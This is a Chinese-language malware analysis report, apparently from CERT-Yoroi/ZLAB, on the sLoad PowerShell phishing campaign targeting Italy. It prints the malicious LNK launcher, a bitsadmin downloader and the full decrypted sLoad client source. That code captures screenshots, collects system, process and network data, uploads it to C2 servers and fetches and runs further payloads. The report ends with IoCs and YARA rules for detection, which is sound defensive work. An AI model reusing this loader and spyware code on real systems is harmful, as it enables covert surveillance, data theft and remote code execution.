SLoad Powershell malspam正在蔓延到義大利
一、介紹
在過去的幾個月裡,CERT-Yoroi觀察到一種新興攻擊模式。一系列惡意電子郵件共享通用技術,這些技術可能與一個威脅組織對義大利網路全面的攻擊有關。目前尚不清楚這些攻擊嘗試是由一個完善的網路犯罪組織修改其TTP所致,還是全新的攻擊嘗試。但CERT-Yoroi正在通過內部代號“Sload-ITA”(TH-163)來跟蹤此威脅。去年五月, ofollow,noindex">SANS ICS 研究人員在英國也記錄了類似的操作行為。惡意行動通過濫用基於壓縮存檔中的程式碼隱藏技術和類似的drop-url模式共享相同的drop mode:
· 2018-10-08 – 使用“/AE-9455933DGW-nota-cliente” url 模式
· 2018-10-09 – 使用“/fattura-per-cliente-QN-OAYSAPV” url 模式
· 2018-10-15 –使用“/MA-47462780Y3-documento-cliente” url 模式
· 某些惡意郵件已從“PEC”郵箱傳送
·2018-11-19 – 使用 “/documento-aggiornato-novembre-ER16909FP9”
· CERT-PA 追蹤
Yoroi-Cybaze ZLAB收集並解析了在響應操作期間恢復的樣本,用來揭示這些攻擊者使用的惡意植入程式的細節。下圖總結了sLoad惡意軟體感染的步驟。
圖1. SLoad感染流程
二、技術分析
分析的惡意樣本是壓縮zip存檔,包含兩個不同檔案:
1. 一個假裝指向系統資料夾的連結,名為“invio fattura elettronica.lnk”
2. 一個隱藏的JPEG影象“image _20181119_100714_40.jpg”,該檔案儲存為HA屬性。
儘管從存檔中提取的LNK檔案表面上看很無辜,但它的武器化方式與APT29在其最新操作期間採用的方式類似,表明該技術是幾種惡意網路武器的一部分。實際上,當用戶雙擊檔案時,批處理指令碼會生成下面的powershell指令碼:
C:\Windows\System32\cmd.exe /C powershell.exe -nop -eP ByPass -win hi"d"den -c "&{$9oc=get-childItem -path c:\users\* -recurse -force -include documento-aggiornato-novembre-*.zip;$g3u=get-content -LiteralPat $9oc.fullname;$g3u[$g3u.length-1]|iex}"
PS指令碼搜尋與模式“documento-aggiornato-novembre – * .zip”匹配的任何檔案:如果檔案存在,則指令碼在其末尾提取一部分程式碼,然後通過“IEX”呼叫它;我們檢查了zip檔案並恢復了這部分程式碼。在下圖中,可以看到附件存檔內容分為粉紅色和黃色,外來程式碼為藍色。
圖2.新增到Zip存檔的程式碼
該部分檔案包含powershell指令碼呼叫的可執行程式碼。由於呼叫了“bitsadmin.exe”,此程式碼能夠從“firetechnicaladvisor.com”下載其他指令碼,然後將所有這些新下載的檔案儲存在“%APPDATA%/ <UUID>”資料夾中。下圖顯示了下載惡意植入程式後文件夾的內容:
圖3.惡意植入程式的元件
下面的片段顯示了負責下載這些惡意軟體的程式碼。
$env_appData=$env:appdata;
$cmd='cmd';
$gen_random_value_name_ps= -join ((65..90) + (97..122) | Get-Random -count 14 | % {[char]$_});
$get_uuid=(Get-WmiObject Win32_computerSystemProduct).UUid;
$set_hidden='hidden';
$folder_to_store_file = $env_appData+'\'+$get_uuid;
$h=$folder_to_store_file+'\d';
if(!(test-path $folder_to_store_file)){
New-item -itemtype directory -Force -path $folder_to_store_file;
};
$ps_to_download_and_execute='/c echo 1 > '+$h+'& bitsadmin /wrap /transfer fredikasledi /download /priority FOReGrOUnd "https://firetechnicaladvisor.com/globa/monu" '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & del '+$h+' & exit';
start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;
$e=1;
Start-Sleep -s 6;
$p2='powe';
while($e -eq 1){
if(test-path $h)
Start-Sleep -s 3
}else{
$e=2
}
};
Start-Sleep -s 7;
$p1='ell';
$ps_to_download_and_execute='/c '+$p2+'rsh'+$p1+' -nop -ep bypass -File '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & exit';
start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;
NxPgKLnYEhMjXT.ps1指令碼安裝並植入受害者的機器,在系統上註冊計劃任務,以確保感染持續存在。然後,該指令碼會自刪除。
圖4.惡意植入程式的安裝指令碼
在快速檢視CxeLtfwc.ps1指令碼之後,我們還注意到惡意軟體使用cmdlet“Invoke-Expression”從“config.ini”檔案載入並執行另一段程式碼。
param ([string]$k = "");
$random_name_of_powershell=Get-Process -name powershell*;
if ($random_name_of_powershell.length -lt 2){
$folder_name = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
$log = $env:APPDATA+"\"+$folder_name;
$key=$k -split "," ;
$Secure= Get-Content $log"\config.ini";
$Encrypted= ConvertTo-SecureString $Secure -key $key;
$encrypted_string = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted);
$expression_to_execute = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($encrypted_string);
Invoke-Expression $expression_to_execute;
}
下圖顯示了惡意植入程式的其他元件如何呼叫此特定程式碼:可以注意到指令碼是使用輸入引數(“1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16“)啟動的,該引數作為金鑰來解密”config.ini“的內容:惡意軟體的真實有效載荷。
C:\Windows\System32\WindowsShell/">PowerShell\v1.0\powershell.exe" -win hidden -ep bypass -File C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\CxeLtfwc.ps1 -k 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -------------- C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\<NOME_CASUALE>.vbs" 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -------------- Dim objWmi, colItems, objItem, strUUID, blnValidUUID,oShell Set objWmi = GetObject("winmgmts:\\" & "." & "\root\cimv2") Set colItems = objWmi.ExecQuery("Select * from Win32_ComputerSystemProduct") Set oShell = WScript.CreateObject ("WScript.Shell") oShell.run "power"+"shel"+"l.exe -win hi"+"dden -ep by"+"pass -Fi"+"le C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\WpaejPkv.ps1 -k "& WScript.Arguments(0),0,True Set oShell = Nothing
“config.ini”和“web.ini”檔案都在執行時通過以下一組系統命令來進行解密和呼叫:
“ConvertTo-SecureString”, [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted); [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($slStr);
下圖顯示了“config.ini”檔案加密後代碼的一部分,之後是其解密的程式碼。
圖5.“config.ini”中的加密有效載荷
這是惡意客戶端的原始碼:
$runDMC = "cmd";
$key=@(1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16)
$morty=$env:APPDATA;
function Get-ScreenCapture{
Param(
[Parameter()]
[Alias("Path")]
[string]$Directory = ".",
[Parameter()]
[ValidateRange(70,100)]
[int]$Quality,
[Parameter()]
[Switch]$AllScreens
)
Set-StrictMode -Version 2
Add-Type -AssemblyName System.Windows.Forms
if ($AllScreens){
$Capture = [System.Windows.Forms.Screen]::AllScreens
}else{
$Capture = [System.Windows.Forms.Screen]::PrimaryScreen
}
foreach ($C in $Capture){
$screenCapturePathBase = $path+"\ScreenCapture"
$cc = 0
while (Test-Path "${screenCapturePathBase}${cc}.jpg") {
$cc++
}
$FileName="${screenCapturePathBase}${cc}.jpg"
$Bitmap = New-Object System.Drawing.Bitmap($C.Bounds.Width, $C.Bounds.Height)
$G = [System.Drawing.Graphics]::FromImage($Bitmap)
$G.CopyFromScreen($C.Bounds.Location, (New-Object System.Drawing.Point(0,0)), $C.Bounds.Size)
$g.Dispose()
$Quality=70;
$EncoderParam = [System.Drawing.Imaging.Encoder]::Quality
$EncoderParamSet = New-Object System.Drawing.Imaging.EncoderParameters(1)
$EncoderParamSet.Param[0] = New-Object System.Drawing.Imaging.EncoderParameter($EncoderParam, $Quality)
$JPGCodec = [System.Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where{$_.MimeType -eq 'image/jpeg'}
$Bitmap.Save($FileName ,$JPGCodec, $EncoderParamSet)
}
}
$productID = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
$path = $morty+"\"+$productID;
$btlog=$path+'\btc.log'
$pp=$path+'\'+$productID;
try{ If(test-path $pp"_0"){ Remove-Item $pp"_*";}}catch{}
try{ If(test-path $pp){Remove-Item $pp;}}catch{}
$ldf='/C bitsadmin /reset';
start-process -wiNdowStylE HiDden $runDMC $ldf;
$Secure= Get-Content $path"\web.ini";
$Encrypted= ConvertTo-SecureString $Secure -key $key;
$slStr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted);
$rStr = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($slStr);
$d=$rStr -split ","
For ($i=0; $i -le $d.Length-1; $i++){
if ($d[$i] -match "http"){
$rp= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
$ldf='/C bitsadmin /transfer '+$rp+' /download /priority normal "'+$d[$i]+'/captcha.php?ch=1" '+$path+'\'+$productID+'_'+$i;
start-process -wiNdowStylE HiDden $runDMC $ldf;
}
}
$e=1;$dd=0;
while($e -eq 1){
$ad=2;
For ($i=0; $i -le $d.Length-1; $i++){
$pp=$path+'\'+$productID+'_'+$i;
if([System.IO.File]::Exists($pp)){
$line=Get-Content $pp
if ($line -eq "sok"){ $did=$i;}
$ad=1;
}
}
$dd++;
if ($dd -gt 60) {
$outU="";
For ($i=0; $i -le $d.Length-1; $i++){
if ($d[$i] -match "http"){
$l=$d[$i].split(".")[0] -replace "[^0-9]" , '';
$p=$d[$i].split(".")[1] -replace "[^A-Z/]" , '';
$n=[int]$l+1;
$r1=$l+'.'+$p;
if ($n -gt 50){ $n=1;}
$r2=[string]$n+'.'+$p;
$outU+=$d[$i]+"," -replace $r1, $r2
}
}
$Secure = ConvertTo-SecureString $outU -AsPlainText -Force
$Encrypted = ConvertFrom-SecureString -SecureString $Secure -key $key
$Encrypted | out-file $path"\web.ini";
stop-process -name powershell*
}
if ($ad -eq 1){ $e=2;}
Start-Sleep -s 3
}
$rp= -join ((65..90) + (97..122) | Get-Random -Count 12 | % {[char]$_})
$ldf='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND "'+$d[$did]+'new/u.jpg" "'+$path+'\web.ini" & exit ';
$ldf | out-file $path'\asd'
start-process -wiNdowStylE HiDden $runDMC $ldf;
$outD="";
$dd=Get-WmiObject -Class Win32_LogicalDisk | Where-Object {$_.Description -match 'Network'} | Select-Object ProviderName,DeviceID;
try{ if ($dd ){for ($i=0; $i -le $dd.length; $i++){$outD=$outD+'{'+$dd[$i].DeviceID+''+$dd[$i].ProviderName+'}';}} }catch {}
try{ if ($dd -and $outD -eq "" ){$outD='{'+$dd[$i].DeviceID+''+$dd.ProviderName+'}';}}catch {}
try{
$nw=$path+'\_nw';
$nr=$path+'\_nr';
$rf='/C net view> '+$nw+' & copy '+$nw+' '+$nr+' & exit';
start-process -wiNdowStylE HiDden cmd $rf;
$e=1;while($e -eq 1){If(test-path $nr){$e=3;}Start-Sleep -s 3;}
$l=get-content $nr;
$gk=$l -match '\\';
if ($gk -and $gk.length -gt 1){ $outD=$outD+'{in network:'+$gk.length+'}'; }
remove-item $nr }catch{}
$cp=Get-WmiObjectwin32_processor | select Name;
try{ if ($cp.length -gt 0){ $cpu=$cp[0].Name }else{$cpu=$cp.Name} }catch {}
try{$v1=(gwmi win32_operatingsystem).caption }catch {}
try{ Remove-Item $path"\*.jpg";}catch{}
try{
if([System.IO.File]::Exists($path+"\f.ini")){
$ci=Get-Content $path"\f.ini";
}else{
$ci=0;
for ($i=0;$i -le 3;$i++){
Get-ScreenCapture;
Start-Sleep -s 40;
}
$cit=Get-ChildItem -Path c:\users -Filter *.ICA -Recurse -ErrorAction SilentlyContinue -Force
if ($cit){ $ci=1; }
$ci | Out-File $path"\f.ini"
}
}catch{}
if (test-path $path"\..\Microsoft\Outlook\"){$ot=1;}else{$ot=0;}
try {$lnk=([System.Uri]$d[$did]).Host}catch{}
$s=0;
while($true){
$out="";
$tt=Get-Process| Select-Object name
for ($i=0; $i -le $tt.length-1; $i++){
$out=$out+"*"+$tt[$i].Name;
}
$rp= -join ((65..90) + (97..122) | Get-Random -Count 12 | % {[char]$_})
$ldf='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND "'+$d[$did]+'captcha.php?lnk='+$lnk+'&s='+$s+'&g=pu&c='+$ci+'&id='+$productID+'&v='+$v1+'&c='+$rp+'&a='+$out+'&d='+$outD+'&n='+$env:ComputerName+'&cpu='+$cpu+'&o='+$ot+'" '+$path+'\'+$productID+' > '+$btlog+' & exit ';
start-process -wiNdowStylE HiDden $runDMC $ldf;
Start-Sleep -s 120;
$pp=$path+'\'+$productID;
if([System.IO.File]::Exists($pp)){
$line=Get-Content $pp;
if ($line -match "run="){
$u=$line -replace 'run=','';
$ldf="/C powershell.exe-command iex ((nEw-ObJect ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe(('"+$u+"')))";
start-process -wiNdowStylE HiDden $runDMC $ldf;
}elseif ($line.length -gt 3){
try{ Remove-Item $path"\*.jpg";}catch{}
$dPath = [Environment]::GetFolderPath("MyDocuments")
$rp= -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})
$ldf='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND '+$line+' '+$path+'\'+$productID+'_'+$rp+'.txt & Copy /Z '+$path+'\'+$productID+'_'+$rp+'.txt '+$path+'\'+$productID+'_'+$rp+'_1.txt & certutil -decode '+$path+'\'+$productID+'_'+$rp+'_1.txt '+$dPath+'\'+$productID+'_'+$rp+'.exe & powershell -command "start-process '+$dPath+'\'+$productID+'_'+$rp+'.exe" & bitsadmin /transfer '+$rp+'s /download /priority normal "'+$d[$did]+'gate.php?n='+$env:ComputerName+'&ts=1&id='+$productID+'&c='+$rp+'" '+$path+'\'+$productID+'_'+$rp+'.txt & exit';
start-process -wiNdowStylE HiDden $runDMC $ldf;
for ($i=0;$i -le 5;$i++){
Get-ScreenCapture;
Start-Sleep -s 40;
}
$ldf='/C del '+$path+'\'+$productID+'_'+$rp+'.txt & del '+$path+'\'+$productID+'_'+$rp+'_1.txt & del '+$dPath+'\'+$productID+'_'+$rp+'.exe & exit';
start-process -wiNdowStylE HiDden $runDMC $ldf;
}
}
for ($i=0; $i -le 5; $i++){
$scr=$path+"\ScreenCapture"+$i+".jpg"
if([System.IO.File]::Exists($scr)){
$rur= -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_});
$rf='/C bitsadmin /transfer '+$rur+' /upload /priority FOREGROUND "'+$d[$did]+'p.php?n='+$env:ComputerName+'&id='+$productID+'&i='+$i+'&s='+$rur+'" "'+$scr+'" & del "'+$scr+'" & exit';
start-process -wiNdowStylE HiDden $runDMC $rf;
}
}
if([System.IO.File]::Exists($btlog)){
$e=0;
foreach($line in Get-Content $btlog -Encoding UTF8) {
if ($line -match "ERROR"){ $e++; }
}
if ($e -gt 0 ){
$rf='/C bitsadmin /reset & exit';
start-process -wiNdowStylE HiDden $runDMC $rf;
stop-process -name powershell*
}
}
Start-Sleep -s 1200;
$s++;
}
解密“web.ini”的內容會顯示惡意植入程式使用的C2的遠端地址:https://hamofgri.me/images/,https://ljfumm.me/images/
惡意客戶端收集有關受害者計算機的資訊,例如:domain,dns cache,running processes,ip和system architecture。此外,它會定期捕獲受害者當前桌面的螢幕截圖,搜尋Microsoft Outlook資料夾並收集使用者目錄中是否存在“* .ICA”Citrix檔案資訊。所有這些資訊都被髮送到命令和控制伺服器。提交資料後,它會直接從攻擊者那裡收到更多的PowerShell程式碼。此行為是特洛伊木馬/間諜軟體惡意軟體的特徵,通常用作重建受感染主機的橋頭堡,甚至成為某些更復雜攻擊的初始階段。
圖6. VT 給Sload 惡意元件評分
三、總結
最近由第三方安全公司和政府CERT報告的sLoad攻擊浪潮對義大利的網路構成了重大威脅,因為攻擊者準備了精心設計的釣魚郵件主題,並且在惡意軟體植入時使用的技術和方法檢測率很低。
目前尚不清楚這些攻擊背後的組織是否是網路犯罪中的全新成員。最初的惡意行動是在2018年5月發現的,針對的是英國使用者。而最近針對義大利使用者的活動始於去年10月,表明該組織的惡意活動有所擴大。
CERT-Yoroi目前正在跟蹤義大利地區的TH-163,ZLAB團隊不斷分析其部件、惡意軟體植入程式和技術,以確保對我們國家的保護。
IoC
惡意urls:
·https://upabovenewyork[.com/.fatturazione/fattura-per-cliente-QN-OAYSAPV
·https://sciencefictionforgirls.[com/cience/ionfo
· upabovenewyork[.com
·91.218.127.[180
·sciencefictionforgirls[.com
· 185.17.27[.100
·https://rootcellarproductions.[com/documento/AE-9455933DGW-nota-cliente
· https://peatsenglishcider.[com/seng/ishci
·rootcellarproductions[.com
·91.218.127.[183
·peatsenglishcider.[com
· 185.17.27[.100
· https://three-bottles[.com/area-riservata/MA-47462780Y3-documento-cliente
· https://icodeucode.[com/col/euco
· three-bottles[.com
·91.218.127.[183
·firetechnicaladvisor.[com
· 185.17.27.[108
· https://cavintageclothing[.com/update/b746yrthdfb.txt
·cavintageclothing.[com
· 185.17.27[.108
·bureaucratica[.org
· 18.13.7[.20
C2 (sload):
·https://balkher.[eu/doc/p2.txt
· https://balkher.[eu/sload/2.0/hostp1.txt
·https://balkher[.eu/sload//img.php?ch=1
·balkher[.eu
·185.197.75[.241
· https://perecwarrio[.eu/sload/
· perecwarrior[.eu
· 185.211.246[.50
· https://ljfumm[.me/images/gate.php
· https://hamofgri.[me/images/gate.php
·https://hamofgri.[me/images/captcha.php?ch=1
·https://ljfumm[.me/images/captcha.php?ch=1
·ljfumm[.me
· hamofgri[.me
·185.197.75[.10
永續性:
·%APPDATA%\<GUID>
Hash:
·b702e8e23165273f8e90615ce4af2f158048bf6b615f545b992fbbb62f7eff27 zip
· 1cbe16ac066aeac78c2f3e41e2afa3433833bf6f65131bcfbf88db97e9b94efb jpg
·d8f4ae0477f7e2931e89e4b6d3e78556d3b5765a2c08bc3bdec8c1f6dc0904c0 lnk
· ed1007884730a664f9cc827fb60924079149a2fec08ca91c2342c368e727c330 zip
·3b5b6cd6ecef252624ee3b5c80d27647766527920b76ebc533f9bc336bfe91ad jpg
· 0a392ded18578069c647383492253f990210b9c9f9293a6ded09eab7e0936562 jpg
·b19794f283f9c09f997cbfcbec8c30a5e48eb520ee7bcabd0d62c7b527105f42 lnk
· 3866a58fe3d459173a28bfdee3ec7a90d7551761121fba9eda3685a268cdeda5 ps1
·ed99528a9e818fb486e468d9744745fcfd7157cc8e18181dce7404483c12e834 zip
·97f9bb29083458c88844a2cecca272a22cac8cf7960b76c3fa46e891eeb18236 lnk
·444e29050bbe68484e33f4e30dbe165186f93884e3336643cfb965156141c5ae jpg
· 6a49ed883ed266682ec275a395e0d7c6489ded6a6d7072e84af696e82f3b49a3 ps1
·f94ebce29158af5f4df34e5af428a514faeef20de08418ad0153ad2a9a07cea0 ps1
·daadae8672c31474047f21008ec131cf6a102dac7ca8b8c6df89d35bdf2246da vbs
· ee1dbf76665f5c07ba1c453d1890aa93307f759c5cce6f59f225111509482a64 ps1
·062cc76eeb34d1d3bb5467836cd2d33cb973fc0a8129947af074675beb1fbf1f ini
· df1cb74942fe9d0897431752c2d9717190aa38f79834e22aa885ec8881134505
Yara規則
rule image_20181119_100714_50_jpg{
meta:
description = "Yara Rule for Trojan/sLoad"
author = "Cybaze Zlab_Yoroi"
last_updated = "2018-11-21"
tlp = "white"
category = "informational"
strings:
$a1 = "Adobe Photoshop"
$a2 = {3A 30 33 3A 32 38}
$a3 = {FF D8 FF E0}
$b = {B4 30 B8 B? ?? ?? ?? BA AD E3 ?? ?? C7 7F 84 6A 09 74 9F 75}
condition:
$a1 and $a2 and $a3 or $b
}
rule documento_aggiornato_novembre_ER16909FP9_zip{
meta:
description = "Yara Rule for Trojan/sLoad"
author = "Cybaze Zlab_Yoroi"
last_updated = "2018-11-21"
tlp = "white"
category = "informational"
strings:
$a1 = "https://firetechnicaladvisor.com/"
$a2 = {24 34 4D 61 30 58 32 6C 49 7A}
$a3 = "image_20181119_100714_40.jpg"
$a4 = "invio fattura elettronica.lnk"
$a5 = {2B 27 2E 70 73 31}
$b = {50 4B}
condition:
1 of ($a*) and $b
}
rule _ini_files{
meta:
description = "Yara Rule for Trojan/sLoad"
author = "Cybaze Zlab_Yoroi"
last_updated = "2018-11-21"
tlp = "white"
category = "informational"
strings:
$a1 = "DkAYQBjADcANAA3ADUAMwBkADAA"
$a2 = "ADMAMgA5AGUAYgA3AGYAM"
condition:
$a1 or $a2
}
rule invio_fattura_elettronica_lnk{
meta:
description = "Yara Rule for Trojan/sLoad"
author = "Cybaze Zlab_Yoroi"
last_updated = "2018-11-21"
tlp = "white"
category = "informational"
strings:
$a1 = {63 00 3A 00 5C 00 75 00 73 00 65 00 72 00 73 00 5C 00 2A}
$a2 = {4D 5A 35 10 00 53 79 73 74 65 6D 33 32}
$b = {4C ??}
$c = {63 6D 64 2E 65 78 65}
$d = "i.e.x."
condition:
1 of ($a*) and $b and $c and $d
}